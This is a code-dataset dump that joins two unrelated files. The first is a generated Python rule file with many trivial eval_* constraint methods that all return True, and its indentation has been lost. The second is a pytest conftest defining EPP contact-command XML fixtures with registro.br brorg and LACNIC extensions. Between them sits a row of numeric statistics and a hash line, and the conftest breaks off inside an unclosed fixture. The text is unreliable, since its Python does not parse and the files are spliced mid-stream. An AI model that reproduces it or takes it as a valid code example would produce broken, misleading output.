# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name1(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype23(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality23(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name23(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name2(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType5(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType6(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType7(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name11(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype4(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality4(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name4(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype25(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality25(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name25(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype27(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality27(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name27(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype29(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality29(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name29(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_classtype31(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_cardinality31(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_name31(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType24(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType26(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType28(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType30(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def eval_associationType32(self, attr_value, this):
#===============================================================================
# This code is executed when evaluating if a node shall be matched by this rule.
# You can access the value of the current node's attribute value by: attr_value.
# You can access any attribute x of this node by: this['x'].
# If the constraint relies on attribute values from other nodes,
# use the LHS/NAC constraint instead.
# The given constraint must evaluate to a boolean expression.
#===============================================================================
return True
def constraint(self, PreNode, graph):
"""
Executable constraint code.
@param PreNode: Function taking an integer as parameter
and returns the node corresponding to that label.
"""
#===============================================================================
# This code is executed after the nodes in the LHS have been matched.
# You can access a matched node labelled n by: PreNode('n').
# To access attribute x of node n, use: PreNode('n')['x'].
# The given constraint must evaluate to a boolean expression:
# returning True enables the rule to be applied,
# returning False forbids the rule from being applied.
#===============================================================================
return True
| 50.089226 | 638 | 0.52309 | 6,929 | 59,506 | 4.391398 | 0.044307 | 0.03155 | 0.060734 | 0.046142 | 0.909557 | 0.874523 | 0.871631 | 0.850532 | 0.845143 | 0.841856 | 0 | 0.018127 | 0.198064 | 59,506 | 1,187 | 639 | 50.131424 | 0.61951 | 0.355342 | 0 | 0.676205 | 0 | 0.001506 | 0.670591 | 0.191609 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060241 | false | 0 | 0.004518 | 0.057229 | 0.182229 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8d8c3e5746fdfaa8bb4951e1bbbbb45db16b357c | 35,200 | py | Python | tests/unit/contact/conftest.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | tests/unit/contact/conftest.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | tests/unit/contact/conftest.py | ivcmartello/registrobrepp | dece39a451bcdb964d337df6aa7bd418a60c1a85 | [
"MIT"
] | null | null | null | #-*- coding: UTF-8 -*-
import pytest
from decouple import config
@pytest.fixture
def contactxmlschema():
from lxml import etree
schema = config('EPPSCHEMAPATH', '../../../schemas') + '/contact-1.0.xsd'
xmlschema_doc = etree.parse(schema)
return etree.XMLSchema(xmlschema_doc)
@pytest.fixture
def brorgxmlschema():
from lxml import etree
schema = config('EPPSCHEMAPATH', '../../../schemas') + '/brorg-1.0.xsd'
xmlschema_doc = etree.parse(schema)
return etree.XMLSchema(xmlschema_doc)
@pytest.fixture
def lacnicorgxmlschema():
from lxml import etree
schema = config('EPPSCHEMAPATH', '../../../schemas') + '/lacnicorg-1.0.xsd'
xmlschema_doc = etree.parse(schema)
return etree.XMLSchema(xmlschema_doc)
@pytest.fixture
def checkcontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<contact:check xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:id>aa-11111</contact:id>
</contact:check>
</check>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def checkcontactcommandwithbrorgxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<check>
<contact:check xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:id>aa-11111</contact:id>
</contact:check>
</check>
<extension>
<brorg:check xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:cd>
<brorg:id>e123456</brorg:id>
<brorg:organization>043.828.151/0001-45</brorg:organization>
</brorg:cd>
<brorg:cd>
<brorg:id>e654321</brorg:id>
<brorg:organization>005.506.560/0001-36</brorg:organization>
</brorg:cd>
</brorg:check>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsecheckcontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:chkData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:cd>
<contact:id avail="1">sh8013</contact:id>
</contact:cd>
<contact:cd>
<contact:id avail="0">sah8013</contact:id>
<contact:reason>In use</contact:reason>
</contact:cd>
<contact:cd>
<contact:id avail="1">8013sah</contact:id>
</contact:cd>
</contact:chkData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsecheckcontactcommandwithbrorgxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:chkData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:cd>
<contact:id avail="0">004138888000184</contact:id>
<contact:reason>In use</contact:reason>
</contact:cd>
<contact:cd>
<contact:id avail="0">006994175000148</contact:id>
<contact:reason>Temporary organization in use</contact:reason>
</contact:cd>
<contact:cd>
<contact:id avail="0">067774281000100</contact:id>
<contact:reason>Temporary organization in use</contact:reason>
</contact:cd>
</contact:chkData>
</resData>
<extension>
<brorg:chkData xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:ticketInfo>
<brorg:organization>006.994.175/0001-48</brorg:organization>
<brorg:ticketNumber>2822407</brorg:ticketNumber>
<brorg:domainName>doremisolfalasi.com.br</brorg:domainName>
</brorg:ticketInfo>
<brorg:ticketInfo>
<brorg:organization>067.774.281/0001-00</brorg:organization>
<brorg:ticketNumber>2822403</brorg:ticketNumber>
<brorg:domainName>edpgviva.com.br</brorg:domainName>
</brorg:ticketInfo>
</brorg:chkData>
</extension>
<trID>
<clTRID>424238335</clTRID>
<svTRID>20060822152406-015-0011</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def createcontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<contact:create xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:postalInfo type="loc">
<contact:name>Joe Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:postalInfo type="int">
<contact:name>Anna Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:email>jdoe@example.com</contact:email>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
<contact:disclose flag="1">
<contact:name type="loc" />
<contact:org type="loc" />
<contact:addr type="loc" />
<contact:voice />
<contact:fax />
<contact:email />
</contact:disclose>
</contact:create>
</create>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createcontactcommandwithlacnicxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<contact:create xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:postalInfo type="loc">
<contact:name>Joe Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:postalInfo type="int">
<contact:name>Anna Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:email>jdoe@example.com</contact:email>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
<contact:disclose flag="1">
<contact:name type="loc" />
<contact:org type="loc" />
<contact:addr type="loc" />
<contact:voice />
<contact:fax />
<contact:email />
</contact:disclose>
</contact:create>
</create>
<extension>
<lacniccontact:create xmlns:lacniccontact="urn:ietf:params:xml:ns:lacniccontact-1.0">
<lacniccontact:password>abc123</lacniccontact:password>
<lacniccontact:reminder>Default</lacniccontact:reminder>
<lacniccontact:language>pt</lacniccontact:language>
</lacniccontact:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def createcontactcommandwithbrorglacnicorgxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<create>
<contact:create xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:postalInfo type="loc">
<contact:name>Joe Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:postalInfo type="int">
<contact:name>Anna Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:street>xyz</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:email>jdoe@example.com</contact:email>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
<contact:disclose flag="1">
<contact:name type="loc" />
<contact:org type="loc" />
<contact:addr type="loc" />
<contact:voice />
<contact:fax />
<contact:email />
</contact:disclose>
</contact:create>
</create>
<extension>
<brorg:create xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:organization>005.506.560/0001-36</brorg:organization>
<brorg:contact type="admin">fan</brorg:contact>
<brorg:contact type="billing">fun</brorg:contact>
<brorg:contact type="member">fuc</brorg:contact>
<brorg:responsible>John Doe</brorg:responsible>
</brorg:create>
<lacnicorg:create xmlns:lacnicorg="urn:ietf:params:xml:ns:lacnicorg-1.0">
<lacnicorg:type>normal</lacnicorg:type>
<lacnicorg:eppPassword>abc123</lacnicorg:eppPassword>
<lacnicorg:eppIP>192.168.0.1</lacnicorg:eppIP>
<lacnicorg:eppIP>192.0.2.0/24</lacnicorg:eppIP>
<lacnicorg:eppIP>203.0.113.0/24</lacnicorg:eppIP>
<lacnicorg:renewalType>member</lacnicorg:renewalType>
<lacnicorg:renewalType>small</lacnicorg:renewalType>
<lacnicorg:renewalType>founding-partner</lacnicorg:renewalType>
<lacnicorg:resourcesClass>all-resources</lacnicorg:resourcesClass>
</lacnicorg:create>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsecreatecontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:creData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>sh8013</contact:id>
<contact:crDate>1999-04-03T22:00:00.0Z</contact:crDate>
</contact:creData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responsecreatecontactcommandwithbrorgxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:creData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>cem456</contact:id>
<contact:crDate>2006-01-30T22:00:00.0Z</contact:crDate>
</contact:creData>
</resData>
<extension>
<brorg:creData xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:organization>005.506.560/0001-36</brorg:organization>
</brorg:creData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>DEF-54321</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def deletecontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<delete>
<contact:delete xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
</contact:delete>
</delete>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def deletecontactcommandwithbrorgxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<delete>
<contact:delete xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
</contact:delete>
</delete>
<extension>
<brorg:delete xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:organization>005.506.560/0001-36</brorg:organization>
</brorg:delete>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responsedeletecontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54321-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def infocontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<contact:info xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
</contact:info>
</info>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def infocontactcommandwithbrorgxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<command>
<info>
<contact:info xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>ab-12345</contact:id>
<contact:authInfo>
<contact:pw>123</contact:pw>
</contact:authInfo>
</contact:info>
</info>
<extension>
<brorg:info xmlns:brorg="urn:ietf:params:xml:ns:brorg-1.0">
<brorg:organization>005.506.560/0001-36</brorg:organization>
</brorg:info>
</extension>
<clTRID>ABC-12345</clTRID>
</command>
</epp>
"""
@pytest.fixture
def responseinfocontactcommandxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:infData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>sh8013</contact:id>
<contact:roid>SH8013-REP</contact:roid>
<contact:status s="linked" />
<contact:status s="clientDeleteProhibited" />
<contact:postalInfo type="int">
<contact:name>John Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:fax>+1.7035555556</contact:fax>
<contact:email>jdoe@example.com</contact:email>
<contact:clID>ClientY</contact:clID>
<contact:crID>ClientX</contact:crID>
<contact:crDate>1999-04-03T22:00:00.0Z</contact:crDate>
<contact:upID>ClientX</contact:upID>
<contact:upDate>1999-12-03T09:00:00.0Z</contact:upDate>
<contact:trDate>2000-04-08T09:00:00.0Z</contact:trDate>
<contact:authInfo>
<contact:pw>2fooBAR</contact:pw>
</contact:authInfo>
<contact:disclose flag="0">
<contact:voice />
<contact:email />
</contact:disclose>
</contact:infData>
</resData>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>54322-XYZ</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseinfocontactcommandwithlacnicxmlexpected():
return """<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">"
<response>
<result code='1000'>
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:infData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>cme254</contact:id>
<contact:roid>SH8013-REP</contact:roid>
<contact:status s="clientDeleteProhibited"/>
<contact:status s="linked"/>
<contact:postalInfo type="int">
<contact:name>John Doe</contact:name>
<contact:org>Example Inc.</contact:org>
<contact:addr>
<contact:street>123 Example Dr.</contact:street>
<contact:street>Suite 100</contact:street>
<contact:city>Dulles</contact:city>
<contact:sp>VA</contact:sp>
<contact:pc>20166-6503</contact:pc>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:postalInfo type="loc">
<contact:name>John Doe</contact:name>
<contact:org>Other Inc.</contact:org>
<contact:addr>
<contact:street>123 Street</contact:street>
<contact:street>7th floor</contact:street>
<contact:street>Suite 123</contact:street>
<contact:city>Miami</contact:city>
<contact:cc>US</contact:cc>
</contact:addr>
</contact:postalInfo>
<contact:voice x="1234">+1.7035555555</contact:voice>
<contact:fax x="3456">+1.7035555556</contact:fax>
<contact:email>jdoe@example.com</contact:email>
<contact:clID>ClientY</contact:clID>
<contact:crID>ClientX</contact:crID>
<contact:crDate>1999-04-03T22:00:00.0Z</contact:crDate>
<contact:upID>ClientX</contact:upID>
<contact:upDate>1999-12-03T09:00:00.0Z</contact:upDate>
<contact:trDate>2000-04-08T09:00:00.0Z</contact:trDate>
<contact:authInfo>
<contact:pw>2fooBAR</contact:pw>
</contact:authInfo>
<contact:disclose flag="0">
<contact:voice/>
<contact:email/>
</contact:disclose>
</contact:infData>
</resData>
<extension>
<lacniccontact:infData xmlns:lacniccontact="urn:ietf:params:xml:ns:lacniccontact-1.0">
<lacniccontact:reminder>My first pet name</lacniccontact:reminder>
<lacniccontact:language>pt</lacniccontact:language>
<lacniccontact:property>inactive</lacniccontact:property>
<lacniccontact:property>bulkwhois</lacniccontact:property>
<lacniccontact:legacy>true</lacniccontact:legacy>
</lacniccontact:infData>
</extension>
<trID>
<clTRID>ABC-12345</clTRID>
<svTRID>DEF-54321</svTRID>
</trID>
</response>
</epp>
"""
@pytest.fixture
def responseinfocontactcommandwithbrorgxmlexpected():
return """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
<response>
<result code="1000">
<msg>Command completed successfully</msg>
</result>
<resData>
<contact:infData xmlns:contact="urn:ietf:params:xml:ns:contact-1.0">
<contact:id>e654321</contact:id>
